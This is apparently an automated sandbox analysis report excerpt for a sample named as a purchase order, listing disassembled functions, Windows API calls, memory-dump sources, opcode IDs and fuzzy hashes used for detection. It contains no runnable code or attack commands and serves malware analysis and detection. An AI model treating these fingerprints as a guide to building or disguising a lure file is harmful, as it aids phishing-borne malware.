                                  • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                  Function 0044DC13 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID: $<
                                  • API String ID: 4104443479-428540627
                                  • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                  • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                  • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                  • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                  Function 0045D779 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ErrorMode$DiskFreeSpace
                                  • String ID: \VH
                                  • API String ID: 1682464887-234962358
                                  • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                  • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                  • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                  • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                  Function 0045D78F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ErrorMode$DiskFreeSpace
                                  • String ID: \VH
                                  • API String ID: 1682464887-234962358
                                  • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                  • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                  • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                  • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                  Function 0045D86D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ErrorMode$DiskFreeSpace
                                  • String ID: \VH
                                  • API String ID: 1682464887-234962358
                                  • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                  • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                  • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                  • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                  Function 0045D36D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                  • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ErrorMode$InformationVolume
                                  • String ID: \VH
                                  • API String ID: 2507767853-234962358
                                  • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                  • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                  • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                  • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                  Function 0045D53E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                  • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ErrorMode$InformationVolume
                                  • String ID: \VH
                                  • API String ID: 2507767853-234962358
                                  • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                  • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                  • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                  • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                  Function 00450ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                  • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID: msctls_trackbar32
                                  • API String ID: 3850602802-1010561917
                                  • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                  • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                  • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                  • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                  Function 00435215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                  • String ID: crts
                                  • API String ID: 943502515-3724388283
                                  • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                  • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                  • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                  • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                  Function 0045D2C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                  • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                  • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ErrorMode$LabelVolume
                                  • String ID: \VH
                                  • API String ID: 2006950084-234962358
                                  • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                  • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                  • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                  • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                  Function 004496E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • GetMenuItemInfoW.USER32 ref: 00449727
                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                  • DrawMenuBar.USER32 ref: 00449761
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Menu$InfoItem$Draw_malloc
                                  • String ID: 0
                                  • API String ID: 772068139-4108050209
                                  • Opcode ID: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                  • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                  • Opcode Fuzzy Hash: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                  • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                  Function 00472A2B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _wcslen$_wcscpy
                                  • String ID: 3, 3, 8, 1
                                  • API String ID: 3469035223-357260408
                                  • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                  • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                  • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                  • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                  Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                  • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: ICMP.DLL$IcmpCloseHandle
                                  • API String ID: 2574300362-3530519716
                                  • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                  • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                  • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                  • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                  Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                  • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: ICMP.DLL$IcmpCreateFile
                                  • API String ID: 2574300362-275556492
                                  • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                  • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                  • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                  • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                  Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                  • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: ICMP.DLL$IcmpSendEcho
                                  • API String ID: 2574300362-58917771
                                  • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                  • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                  • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                  • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                  Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                  • API String ID: 2574300362-4033151799
                                  • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                  • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                  • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
